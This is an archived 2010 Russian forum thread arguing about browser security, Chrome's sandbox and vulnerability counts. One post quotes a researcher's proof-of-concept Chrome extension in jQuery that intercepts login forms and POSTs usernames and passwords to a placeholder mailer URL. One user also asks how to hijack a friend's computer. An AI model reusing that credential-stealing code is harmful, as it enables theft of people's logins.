Ru-Board.club
← Вернуться в раздел «Тестирование»

» Браузерные войны: 2010 (Windows) [4]

Автор: MastaG
Дата сообщения: 16.09.2010 17:49
Samars

Цитата:
сообщите кто там может эксплойт на Хром запустить

читайте, читайте:

Цитата:
Участники хакерской конференции в США Black Hat 2010 сделали вывод, что все современные веб-браузеры уязвимы перед эксплоитами


Цитата:
да даже если и знаю, то я не больной на голову выдавать людей которые совершенно не желают себя светить по понятным причинам!
если для вас хакинг это развлечение подростков типа - кто кому подкинет троянчика и т.п. чтоб потом кричать всем какой он кулхацкер, то для подавляющего числа людей серьезно этим занимающихся реклама совершенно не нужна и они на этом зарабатывают (при чем достаточно серьезные деньги).


вам в помощь:



только НЕ путайте с:



или


хотя, не уверен, что вам поможет, если для вас Black Hat это
Цитата:
хакеры из яндекса
а
Цитата:
Pwn2Own, если вы не пишете о каком то другом конкурсе (даунов судя по вашей интерпретации).
для вас
Цитата:
P2Down
после указаний на ошибочность написания, и для вас серьезные хакеры это только участники Pwn2Own.
в конкурсах не любитель участвовать, найдите себе другого "соучастника", особенно в вашей интерпретации конкурса

ilyaor

Цитата:
Samars
Цитата: Неправду говорите

Цитата:
ilyaor
Цитата: а вы на скрин хоть посмотрели...
да не спорьте с ним у него:
Цитата:
Верить нельзя никому. Даже себе. Мне - можно. (с) Google


0SHV

Цитата:
У оперманов в крови нужно гнобить любой браузер

так понимаю, слово "любой" правильнее заменить на "Опера", и про пользователей не забыть


Цитата:
А вип персонам нужен малиновый лапсердак и желтые шаровары.
Иначе на них никто внимание не обратить

о! на вас тоже похоже! очень, очень!!


Цитата:
xChe
Цитата:
Это про картинки с гамном?


Цитата:
0SHV
Цитата: Вспомните кто начал.

серьезно - не помню чтоб кто-то кроме вас тут постил картинки с "гамном".
Автор: WatsonRus
Дата сообщения: 16.09.2010 18:09
GalielO
18:44 16-09-2010
Цитата:
Вы вот лелеяли Opera, а что теперь имеете?

Нормально работающие полностью заточенные под себя старые версии. Мне их достаточно. Но я их не лелею, я ими пользуюсь. Плюс как "запасной" - последнюю финальную версию.

Цитата:
Это его хобби и если ему нравится, то что?

Нелогично это.
Автор: ilyaor
Дата сообщения: 16.09.2010 18:22

Цитата:
Нормально работающие полностью заточенные под себя старые версии. Мне их достаточно. Но я их не лелею, я ими пользуюсь. Плюс как "запасной" - последнюю финальную версию.

все верно - девятая серия - 100% рабочая, а что десяткой пользуюсь - так просто любопытства ради =) допилят же её в конце-то концов =)
а вот попытки расхвалить 4 лису считаю пустыми - ничавошеньки в ней не поменялось , разве что плагины не все работают
Автор: GalielO
Дата сообщения: 16.09.2010 18:23
WatsonRus

Цитата:
Нелогично это.

Насколько я понял дома у него Opera установлена, а на работе FireFox, т.е. окончательно он не перешёл на FireFox и в нём ещё теплится надежда. Вот и критикует, чтоб разрабы задумались, а не ваяли очередное ... Критика не вредила ещё никому.
Автор: mime13
Дата сообщения: 16.09.2010 18:31
Samars

Цитата:
О.К. буду писать канонически.

спасибо.

Цитата:
Вы это серьёзно или прикидываетесь?

сами разрабы советуют обновится на новые версии при нахождении уязвимостей, зачем если никакого риска.
баг с флешем в хроме активно используется в данный момент (об этом же на секлабе пишут).
deleted
Автор: MastaG
Дата сообщения: 16.09.2010 18:34

Цитата:
Samars
Цитата:
Уязвимости это одно - находят их чуть ли не ежедневно


Цитата:
это обязательный атрибут

в Хроме очень похоже - 14 раз за менее чем 9 месяцев найдены уязвимости критического и высокого уровня!!
ВСЕ из которых множественные, и одна критическая БЕЗ найденного решения на данный момент!

Для сравнения:
Internet Explorer - 10 (1 из них высокая по старому ИЕ6). 3 из которых критические с найденным решением!
Mozilla Firefox 12. Критических НЕТ!
Opera - 5. Критических НЕТ!
Safari - 3. Критических НЕТ!

В итоге, можно с уверенностью сказать, что Хром на сегодняшний день в этом - самый, самый отличившийся.


Цитата:
Хром ....команда разработчиков наиболее мощная в мире на данный момент

а Мелкософт?
Автор: mime13
Дата сообщения: 16.09.2010 18:36
а все в курсе про дыру во флеше, которую закроют только через 2 недели
Автор: Samars
Дата сообщения: 16.09.2010 18:37
MastaG
Ну и где немногословный товарищ имена и явки? Языком трепать все горазды, а вот где факты обхода защиты? Видимо великие берегут себя и свои знания для будущих свершений.


Цитата:
читайте, читайте:

Участник конференции. Я читаю читаю. Где факты? Факт в том, что на данный момент никто не знает как обойти встроенную защиту Хром.


Цитата:
да даже если и знаю, то я не больной на голову выдавать людей которые совершенно не желают себя светить по понятным причинам!
если для вас хакинг это развлечение подростков типа - кто кому подкинет троянчика и т.п. чтоб потом кричать всем какой он кулхацкер, то для подавляющего числа людей серьезно этим занимающихся реклама совершенно не нужна и они на этом зарабатывают (при чем достаточно серьезные деньги).

Не я конечно понимаю что кто-то где-то на чём-то зарабатывает, но я не думаю что автор книги The Mac Hacker's Handbook Чарли Миллер сломавший Сафари три года подряд (на последних соревнованиях у него было на вооружении 20 найденных им лично уязвимостей!) будет трепать языком просто так. Он подробно описал как пытался взломать Хром и что мешает его взломать. Так вот он объясняет для тех кому "самореклама не нужна", прочие вряд ли вообще поймут, либо не заинтересуются - что без появления бага в защите Хром песочнице запустить эксплойт никто не сможет. А если не использовать флеш так вообще даже эксплойт сложно подобрать рабочий.

Как он говорит:


Цитата:
Я не делаю ничего, что не могли бы сделать тысяча других людей в мире, если бы захотели этого. Пока что это довольно легко — находить уязвимости в этих платформах и создавать для них эксплойты.


Или вот другой участник соревнований - голландский исследователь Петер Фройгденхил (Peter Vreugdenhil), взломал IE8, запущенный на машине, работающей под управлением Windows 7. Его атака состояла из чётырёх частей и использовала две уязвимости.

Голландец успешно обошёл защиту DEP и ASLR и сумел получить права пользователя на целевом компьютере.

Все эти исследователи и энтузиасты (многие в реальной жизни работуют по профилю) это так - мутота. А вот где-то кто-то что-то может! Ух какие там гении. Но молчат. Не раскрывают секрета обхода песочницы.


Цитата:
после указаний на ошибочность написания, и для вас серьезные хакеры это только участники Pwn2Own.

Нет конечно это прежде всего что-то где-то говорящие участники конференций, скрывающие свои знания от вездесущих спецслужб (участвуя в конференции). Но самый крутой хакер это MastaG он как и полагается стеснительный-


Цитата:
в конкурсах не любитель участвовать,

ну как решишься опубликовать свои мемуары описывающие взлом Хром так заходи.


Цитата:
В итоге, можно с уверенностью сказать, что Хром на сегодняшний день в этом - самый, самый отличившийся.

Так точно - даже критические уязвимости невозможно использовать, хотя находят их чаще в чем в других браузеры по причине наличия мощнейшей команды разрабов. Молодцы гугловцы изначально создали непробиваемый заслон (как раз и защищающий браузер от использования уязвимостей), а теперь класть они хотели на любые уязвимости.

Чесаться нужно будет если найдут механизм обхода защиты песочницей.
Автор: WatsonRus
Дата сообщения: 16.09.2010 18:45
GalielO
19:23 16-09-2010
Цитата:
Насколько я понял дома у него Opera установлена, а на работе FireFox, т.е. окончательно он не перешёл на FireFox и в нём ещё теплится надежда.

Судя по топику Оперы, надежды уже нет.

Samars
Посмотрим, что будет с Хромом, когда он достигнет % Фокса. До поры до времени Фокс тоже считался почти неуязвимым. А рано или поздно в команде Гугла найдутся обиженные.
Автор: OFFEND
Дата сообщения: 16.09.2010 18:46
ilyaor
Цитата:
а вот попытки расхвалить 4 лису считаю пустыми - ничавошеньки в ней не поменялось , разве что плагины не все работают

Что вы там нового ждали, и что поменять надо было по вашему мнению?
Автор: Samars
Дата сообщения: 16.09.2010 18:48
WatsonRus

Цитата:
Посмотрим, что будет с Хромом, когда он достигнет % Фокса. До поры до времени Фокс тоже считался почти неуязвимым.

Тоже взломают. Формально его может взломать хакер любого уровня - песочница мешает. Некоторое время потребуется на разработку мер её обхода. За два года существования такой метод не найден. Весной 2011 узнаем что изменилось, хотя в общем-то и раньше может произойти. Песочницу вроде и в FF вводят?
Автор: 0SHV
Дата сообщения: 16.09.2010 19:00
Samars

Цитата:
Песочницу вроде и в FF вводят?

пока только для плагинов сделали. Вот например сравнение от МС Ссылка
по-большому счету все почти одинакое. Безопастность пока особо не освещена подробно.
Но они писали, что будет совершенно иной уровень ее.

между прочим создана оф. биржа для продажи сплоитов. )
Там можно будет продавать их, но есть кое какие ограничения.
Самое интересное, что это создала та компания, которую оперфаны очень и очень не любят. ))

Добавлено:
для критиков IE9 читайте, что МС пишет на главной странице.

Поддержка современных стандартов
Единые стандарты позволяют сохранить работоспособность и одинаковый вид сайта при использовании любого браузера.


В чужой огород они не лезут. )
Автор: MastaG
Дата сообщения: 16.09.2010 19:03
Samars

Цитата:
я не думаю что автор...

повтор (пока вы не прикупили очки):

Цитата:
для вас серьезные хакеры это только участники Pwn2Own


Цитата:
для вас Black Hat это
Цитата: хакеры из яндекса




Цитата:
без появления бага в защите Хром песочнице запустить эксплойт никто не сможет

правильнее - "без нахождения бага..."


Цитата:
Факт в том, что на данный момент никто не знает как обойти встроенную защиту Хром

"- Ты видишь суслика?
- Нет.
- И я не вижу.
- А он есть!" (с)


Цитата:
Но самый крутой хакер это MastaG

укажите где я себя таковым называл, иначе ложь пистеж и провокация


Цитата:
где-то кто-то что-то может. Но молчит...

странно наблюдать как человек наивно надеется получить подобную инфу так просто


Цитата:
по причине наличия мощнейшей команды разрабов. Молодцы гугловцы изначально создали непробиваемый заслон (как раз и защищающий браузер от использования уязвимостей)

т.е. разрабы такие маленькие, тяжеловооруженные нано-человечки спрятанные в инсталяторе Хрома, и в случае чего устраивают алопекс лагопус


Цитата:
Весной 2011 узнаем что изменилось, хотя в общем-то и раньше может произойти

ок - записываю:
- "Час "П" наступит весной 2011 или раньше тчк"


Добавлено:
а что будет в 2012? большой прибольшой "П"?
Автор: mime13
Дата сообщения: 16.09.2010 19:08
Samars
3 недели назад:

Цитата:
Google в минувший четверг выпустила новую версию браузера Chrome, в которой компания устранила сразу 10 разных уязвимостей. Согласно данным компании, 7 багов имели "высокий" уровень опасности, еще 3 - "средний".

В компании традиционно не предоставляют данные о уязвимостям и не публикуют возможные эксплоиты. В Google говорят, что согласно реализованной системе безопасности, вся информация по устраненным багам будет опубликована ровно через два месяца после устранения.

Сейчас известно лишь, что две из устраненных уязвимостей позволяли проводить удаленный взлом системы через файлы SVG и MIME. Еще два бага были связаны с неверным обращением Chrome к ядру Windows и библиотекам Glibc в Linux.
Автор: Samars
Дата сообщения: 16.09.2010 19:09
Ладно ждём твоих мемуаров. Я тебе напомню через годик - расскажешь как песочницу обойти и когда данный метод был разработан. А пока грошь цена твоим словам, не рекомендую никому общаться с этой личностью.


mime13

Цитата:
Сейчас известно лишь, что две из устраненных уязвимостей позволяли проводить удаленный взлом системы через файлы SVG и MIME. Еще два бага были связаны с неверным обращением Chrome к ядру Windows и библиотекам Glibc в Linux.

Это ложная информация - обход песочницы пока не разработан и запуск эксплойта невозможен. Да и вообще говорить о том что там устраняют в условиях когда:


Цитата:
В компании традиционно не предоставляют данные о уязвимостям и не публикуют возможные эксплоиты.


как минимум странно. Получается что тот гений кто нашёл уязвимости тот о них и сообщает. В Гугл за это бабули платят: нашёл - получи деньги. За обход песочницы они бы не поскупились, ключевая функция в безопасности браузера.
Автор: mime13
Дата сообщения: 16.09.2010 19:14

Цитата:
Единые стандарты позволяют сохранить работоспособность и одинаковый вид сайта при использовании любого браузера.

именно поэтому некоторые страницы о бете ие9 по-разному выглядели в хроме и ие??



Добавлено:

Цитата:
В рамках симпозиума Usenix Security Symposium эксперты проверили исследование приватных режимов просмотра в браузерах Internet Explorer, Mozilla Firefox, Google Chrome и Safari. После проведеных тестирований, эксперты пришли к выводу, что с обязанностью сохранять анонимность и не оставлять следов после посещения сайтов в Интернете браузеры не справляются.

Одна из проблем состоит в том, что при сохранении SSL-сертификатов браузеры записывают действия с сертификатом в файл, просмотреть который может любой человек с физическим доступом к компьютеру. Например, в Mozilla Firefox - это файл cert8.db, в который записывается часть истории посещения ресурсов с SSL-сертами.

Также при просмотре страниц в защищенном режиме Firefox, данные компрометируются в случае использования уникальных для каждого сайта настроек, либо при использовании одобренных Mozilla плагинов. Плюс к этому, запоминается история с сайтов, использующих специфические команды управления, основанные на стандарте HTML5.

Режим InPrivate в браузере Internet Explorer, в свою очередь, разглашает данные, когда веб-сайты осуществляют запросы SMB. Это происходит из-за того, что веб-обозреватель от Microsoft делит значительную часть кода с файловым менеджером Windows Explorer.


Добавлено:

Цитата:
Специалист по компьютерной безопасности Андреас Грэх обратил внимание на очередную брешь безопасности в веб-браузере Google Chrome. Уязвимость была обнаружена в новой функции Google Chrome, позволяющей сторонним разработчикам создавать расширения на JavaScript и HTML с возможностью доступа к объектам DOM. Доступ к объектной модели документа позволяет плагину получить значения каких-либо полей форм на любом из открытых веб-сайтов, не исключением являются поля ввода логина и пароля.

В рамках своей публикации, Андреас Грэх подробно рассматривает пример реализации простейшего расширения для Google Chrome, позволяющего реализовать описанный функционал. Для создания экспериментального плагина использовалась технология AJAX и библиотека jQuery. Созданное в итоге расширение отлично справлялось с перехватом логина и пароля доступа на Gmail, Facebook, Twitter и других популярных веб-ресурсах.

Таким образом, у любого расширения, установленного в Google Chrome появляется возможность шпионить за вводимыми логинами и паролями. Единственным способом обеспечения собственной безопасности является отказ от использования расширений сомнительных разработчиков, но никто не мешает разработчикам использовать эту уязвимость и в популярных расширениях для веб-браузера Google Chrome.


[more=пример експлоита]For this extension, I am making use of jQuery as to write quick code for this prototype, but it can obviously be rewritten without it's dependency.

The first thing the script does is attach a submit handler to every form field on the page:

$("form").submit(function(e) {
var $this = $(this);
e.preventDefault();
process(function() {
$this.unbind('submit');
$this.submit();
});
});

We hook to the submit handler to prevent the default behaviour of the form (ie submitting normally) with e.preventDefault and to call our process function:

var process = function(callback) {
var username = $("input[type=text]").not(passwordBoxes).filter(function() {
var field = $(this);
return field.val() || field.html();
}).val(),
password = passwordBoxes.val();

sendEmail(username, password, location.href, callback);
};

The process function captures the values of the username and password fields respectively. passwordBoxes is a variable containing the inputs of the page that have their type set as password:

var passwordBoxes = $("input[type=password]");

Upon capturing the values of the username and password fields, these are sent along with the current url and the callback that submits the form to the sendEmail function which sends the email with the username, password and url via an Ajax call:

var sendEmail = function(username, password, url, callback) {
var msg = getMessage(username, password, url);
$.ajax({
type: 'POST',
url: 'the url of the mailer script',
data: 'the headers you want to send',
success: callback
});
};

The getMessage function simply returns a formatted string with the details that will be contained in the email:

var getMessage = function(username, password, url) {
return "Username: " + username + " || Password: " + password + " || Url: " + url;
};

After the details are sent, the callback is invoked which submits the form normally.

Note that there could be a very small delay between the user clicking the submit button and the form being submitted because of the Ajax call, but it is barely noticeable.[/more]

Добавлено:

Цитата:
Все современные веб-браузеры уязвимы. Об этом заявили участники хакерской конференции в США Black Hat 2010. По данным экспертов, при помощи существующих эксплоитов потенциальные злоумышленники могут получать доступ к банковским счетам пользователей, информации в закрытой части социальных сетей и использовать их в других незаконных сферах.

"Ни один из существующих браузеров не устоял перед представленными на Black Hat эксплоитами. Все представленные эксплоиты применять совсем несложно", - говорит Джеремайя Гроссман, тенхнический директор WhiteHa Security.

По его словам, существующие эксплоиты могут получать из браузеров хранимую информацию массой способов и из самых разных источников, например из системы автозаполнения, присутствующей во всех современных браузерах. В данной системе содержатся данные об имени пользователя, его электронной почте, данных о кредитных картах и другой информации.

По словам Гроссмана, безопасность современных браузеров - это основная тема BlackHat 2010. Наиболее остро стоит сейчас проблема обеспечения безопасности пользовательских данных, с которыми работают браузеры, обеспечение приватности пользователей в интернете.

На конференции различными группами ИТ-специалистов были представлены несколько эксплоитов, атакующих функцию автозаполнения в современных браузерах Internet Explorer. Safari, Chrome и Firefox.


Добавлено:

Цитата:
Это ложная информация


блажен кто верует.

а пример рабочего експлоита тоже ложь ))))

все, т.к. на все доводы ответ один, то думаю продолжать смысла нет.
Автор: embrace909
Дата сообщения: 16.09.2010 19:23

Цитата:
Сейчас известно лишь, что две из устраненных уязвимостей позволяли проводить удаленный взлом системы через файлы SVG и MIME.

Где можно прочитать (мануал) как через эксплойты взять управление над компьютером друга?
Автор: MastaG
Дата сообщения: 16.09.2010 19:37
Samars

Цитата:
Гугл за это бабули платят

не ну серьезно - не смешно это - когда человек думает, что серьезному хакеру выгоднее себя выдать получив каких-то 10к уё один раз, когда он может ежемесячно иметь доход и особо не париться в размере десятков-сотен тысяч уё
реально, складывается впечатление, что у вас представление людях серьезно занимающихся хакингом как о школоте подкидывающей друг другу троянчиком, либо вы неопытный сотрудник гугля надеющийся "на слабо" получить информацию о не закрытых дырах в Хроме или о людях их нашедших (из-за которых гугль может терять часть клиентов)


Цитата:
Это ложная информация

Раз вы верите только Гуглю - почитайте Гугл-информ: В браузере Chrome закрыты 10 уязвимостей
"Все врут!" И даже Гугл иногда?!


Цитата:
цена твоим словам...

так я вам почти всю инфу давал из официальных источников - ссылки были, а что для вас Black Hat для вас это хакеры из яндекса - кто вам доктор... - вот им и предъявляйте претензии.
так что продолжайте в том же духе - очень интересно наблюдать - как человек пытается спорить и доказывать когда ему приводят конкретные общеизвестные факты, а у него все лгут даже кто являются очень уважаемые и известные персоны в сфере IT безопасности (Black Hat и т.д.). как тут писали:

Цитата:
обосраться но не сдаться (с)


mime13

Цитата:
блажен кто верует.
а пример рабочего експлоита тоже ложь ))))

ну так - меньше знают - крепче спят!
Автор: mime13
Дата сообщения: 16.09.2010 19:41

Цитата:
Mozilla Foundation выпустив на прошлой неделе достаточно внушительное обновление безопасности для веб-браузера Firefox, вынуждена была приостановить работу автоматической системой обновления веб-браузера из-за сбоев, вызываемых этим обновлением.

Выпущенное обновление содержало исправления 15 уязвимостей, 11 из которых являются критическими и могут использоваться злоумышленниками для распространения вредоносного кода через веб-браузер Firefox. Однако многие пользователи не получили этого обновления через автоматическую службу обновления, так как ее работа была приостановлена компанией Mozilla. Причиной остановки стали множественные жалобы "счастливчиков", которые все-таки успели выполнить установку обновления веб-браузера Firefox до новых версий 3.5.12 и 3.6.9, через автоматическую службу обновлений.

После установки обновления и запуска обновленной версии веб-браузера происходил перезапуск системы, причем подвержены этому оказались веб-браузеры для разных платформ - Windows, Linux и Mac. Установка же новых версий с перезаписью старых файлов такого сбой не вызывала. Учитывая эти обстоятельства, служба автоматического обновления Firefox была приостановлена до выяснения и устранения причин, вызывающих сбой.
Автор: MastaG
Дата сообщения: 16.09.2010 19:49
Samars

Цитата:
по причине наличия мощнейшей команды разрабов

Google уволила сотрудника, шпионившего за пользователями

Цитата:
Молодцы гугловцы


судя по инфе - парень хакер. интересно, как он использует свои знания о Хроме или сервисах гугля, после того как его гугль нах послал?

Добавлено:
инфа и ссылка Гугл-информ. но там же тоже "все врут!"
Автор: GalielO
Дата сообщения: 16.09.2010 20:11

Цитата:
"- Ты видишь суслика?
- Нет.
- И я не вижу."


Цитата:
ох какая попаболь..... такая сильная

Какой подлый суслик.
Автор: 0SHV
Дата сообщения: 16.09.2010 20:15
Samars

Цитата:
обход песочницы пока не разработан и запуск эксплойта невозможен.

Ограничения модели "sandbox" у Chrome тоже есть – нельзя заключить "в песочницу" плагины для web-браузера, такие как Flash и Java.
Этим плагинам требуется полный доступ к системе, поэтому "песочницы" для рендеринга web-страниц использовать не получится.
Процессоры рендеринга web-контента очень ограничены по своим правам, им не предоставляется доступ к файловой системе вообще.
В общем, выбраться из "песочницы" web-рендеринга Chrome – это уже очень сложная задача сама по себе.


дыра во флеше сейчас позволяет обойти это. )
Хром очень защищенный по сравнению с другими.

Вот видео, как любимую тут Оперу "пробивают". )
Ссылка
пасс на архив стандартный.
Автор: OFFEND
Дата сообщения: 16.09.2010 20:32
MastaG
Цитата:
парень хакер. интересно, как он использует свои знания о Хроме

Ну даже если вы не признаёте декларированную Google лицензию на Google Chrome, можно аналогично - исходники Firefox и, Chromium например - открыты. И чего? Изучайте на здоровье.

Цитата:
или сервисах гугля

да никак, после того как его уволили.

Автор: Samars
Дата сообщения: 16.09.2010 20:57
OFFEND

Цитата:
Ну даже если вы не признаёте декларированную Google лицензию на Google Chrome, можно аналогично - исходники Firefox и, Chromium например - открыты. И чего? Изучайте на здоровье.

Во наконец-то наблюдательный человек упомянул, что практически любой может изучить всё что хочет в браузерах с открытым кодом - даже собственный браузер создать на базе того же Хромиума. Конференции блин.

0SHV

Цитата:
В общем, выбраться из "песочницы" web-рендеринга Chrome – это уже очень сложная задача сама по себе.

дыра во флеше сейчас позволяет обойти это. )
Хром очень защищенный по сравнению с другими.

Всё верно, тот же Миллер это и констатировал. Увы в самом браузере уже ничего не сделаешь поскольку:


Цитата:
Этим плагинам требуется полный доступ к системе, поэтому "песочницы" для рендеринга web-страниц использовать не получится.

это уже не беда браузера и его мощной системы безопасности. Плагины работают поверх песочницы. Специалисты рекомендуют отключать данные плагины на любом браузере по тем же самым причинам - если есть опасность потери ценной информации и.т.д.

mime13

Цитата:
блажен кто верует.

Именно. Куда легче тем кто знает. А вот вы не тот же блаженный верующий в возможность прорыва чрез песочницу?


Цитата:
а пример рабочего експлоита тоже ложь ))))

Рабочие эксплойты существуют чуть ли не с выхода Хром - проблема в том что нужен обход песочницы, а его нет. Запусти свой рабочий эксплойт у кого-нибудь и видео запиши, может и без мемуаров репера тьфу, хакера Масты обойдёться тогда.
Автор: MastaG
Дата сообщения: 16.09.2010 21:06
GalielO

Цитата:
А он есть!





OFFEND

Цитата:
исходники Firefox и, Chromium например - открыты.

А как ситуация с Google Chrome? Тоже открыты?
Тем более, человек может открыть не 1 дыру, а десятки - если знает весь код Хрома.
О том персонаже был вопрос, а не утверждение


Цитата:
да никак

хз - время покажет.

Добавлено:
Samars
долго вы консультировались по поводу той инфы?


Цитата:
наблюдательный человек

у нас была речь о Хроме.
жду от вас ссылку на открытые исходники Хрома на сайте Гугля!


Цитата:
Конференции блин

да не говорите - кто такие "хакеры из яндекса" Black Hat, да и еще куча других всемирно известных специалистов?!....


Цитата:
самом браузере уже ничего не сделаешь

А суслик то есть!
Кстати, что на счет эксплоита который вам привели в пример.
И по поводу упомянутых объявлений о эксплоитах?
Автор: 0SHV
Дата сообщения: 16.09.2010 21:21
Samars

Цитата:
это уже не беда браузера и его мощной системы безопасности.

в данном случае выходит беда.
Хром сейчас изначально с флешем идет.
Это удобно никто не спорит, но из-за этого могут возникнуть проблемы.
Вторая неудачная вещь то, что можно загружать свои расширения к ним особо не парясь.
Я тут показывал ссылки, когда была куча расширений (китайских) загружена с троянами.
Контроль у них за этим делом неудачный и неважный.
Например Apple требует все расширения подписывать и они проверяются предварительно.
Гугл пока не изменил ничего. Это минус свободного ПО.
Но у Гугла есть огромное преимущество перед всеми, они мониторят сеть как никто другой. )
Я приводил тут отчет за первое полугодие 2010 года, там у Гугла время исправление дыр самое большое по сравнению с другими.
Даже у МС стало ниже. Есть еще один плюс Хрома, его пользователи быстрее всех обновляются. )

Автор: mime13
Дата сообщения: 16.09.2010 21:28
Samars

Цитата:
Именно. Куда легче тем кто знает. А вот вы не тот же блаженный верующий в возможность прорыва чрез песочницу?

я привел конкретные высказывания людей. имена указаны.
даже если сниму видео вы заявите что сфабриковал.
самое главное что опровергнуть кроме как заявлениями - типа все это ложь не можете
фанатизм это плохо

Цитата:
Рабочие эксплойты существуют чуть ли не с выхода Хром - проблема в том что нужен обход песочницы, а его нет.

глупость сказали.
если код не пробивает браузер - он не является эксплоитом (по крайней мере рабочим).
может скажете что ни под одну версию хрома небыло ни одного рабочего??
а песочница с самого начала там.

заглянул в профиль и стало все понятно

2 OSHV
вы вроде любили приводить оперных фанатов в пример




Автор: MastaG
Дата сообщения: 16.09.2010 21:31
Samars

Цитата:
рекомендуют отключать данные плагины

мне интересно как много современных сайтов без флеша или явы


Цитата:
репера

о! GalielO тут вы себя и выдали. вы единственный кого на руборде так волновало где я отписывался, и кто так переживал о моих музыкальных предпочтениях.
только вы забыли - что, я уже давно и в других темах отписался, и та тема уже не висит в инфе моего профа - только что сам проверял.
и со зрением у вас такие же как и у GalielO проблемы...
я уже писал о вашей дате регистрации - сильно совпадает с началом вашей попаболи в теме браузерных войн.
ох какая у вас попаболь... еще пообщайтесь сам с собой
первый раз вижу такого клоуна

Добавлено:
mime13

Цитата:
я привел конкретные высказывания людей. имена указаны.
даже если сниму видео вы заявите что сфабриковал.
самое главное что опровергнуть кроме как заявлениями - типа все это ложь не можете
фанатизм это плохо

"Все лгут!"
особенно улыбают подобные его высказывания когда его уже носом тычут, и ссылки дают, а он
"обосраться но не поддаться" (с)


Цитата:
заглянул в профиль и стало все понятно

да, да - тролото от GalielO версия хз какая. но видимо бета - раз так лажается
Автор: mime13
Дата сообщения: 16.09.2010 21:37
MastaG

Цитата:
мне интересно как много современных сайтов без флеша или явы

ну ява нужна для специфических вещей (не путаем с ява-скрипт)
а от флеша неплохо защищает флешблокер - по крайней мере снижает опасность заражения, т.к. запускаем только, что нужно.
Автор: MastaG
Дата сообщения: 16.09.2010 21:40
mime13
да. но флеш то довольно часто используется сегодня на серьезных сайтах
бывают и такие "продвинутые", что при его отключении на сайте не посерфиш нормально.

Добавлено:
0SHV

Цитата:
Вот видео

на ютуб лучше скинуть т.к. не все будут качать, и хз что ты в архив закинул

Страницы: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158

Предыдущая тема: ключик


Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.